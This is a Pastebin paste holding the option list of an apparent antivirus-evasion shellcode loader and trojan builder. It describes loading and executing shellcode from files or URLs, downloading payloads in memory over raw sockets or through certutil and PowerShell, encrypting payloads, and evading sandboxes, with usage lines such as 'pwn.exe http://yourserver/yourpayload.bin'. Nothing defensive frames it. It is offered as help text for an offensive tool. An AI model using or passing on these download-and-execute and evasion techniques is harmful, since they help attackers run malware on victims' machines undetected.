Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -l load and exec shellcode from given file, call is with mytrojan.exe myshellcode.bin
- when called with -E call with mytrojan.exe shellcode.txt
- -f compile shellcode into .exe, needs filename of shellcode file
- -u load and exec shellcode from url using internet explorer (url is compiled into executable)
- -d download the shellcode file using different techniques
- -d sock -> for downloading a raw shellcode via http in memory and exec (no overhead, use socket)
- usage example: pwn.exe http://yourserver/yourpayload.bin
- -d certutil -> use certutil.exe for downloading the file
- -d powershell -> use powershell for downloading the file
- usage of -d certutil/powershell in combination with -f
- for executing the raw shellcode after downloading
- call: pwn thepayload.bin http://server/thepayload.bin
- -E use avets ASCII encryption, often this does not have to be used
- Can be used with -l
- -F use fopen sandbox evasion
- -k "killswitch" sandbox evasion with gethostbyname
- -X compile for 64 bit
- -p print debug information
- -q quiet mode (hide console window)
- -h help
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement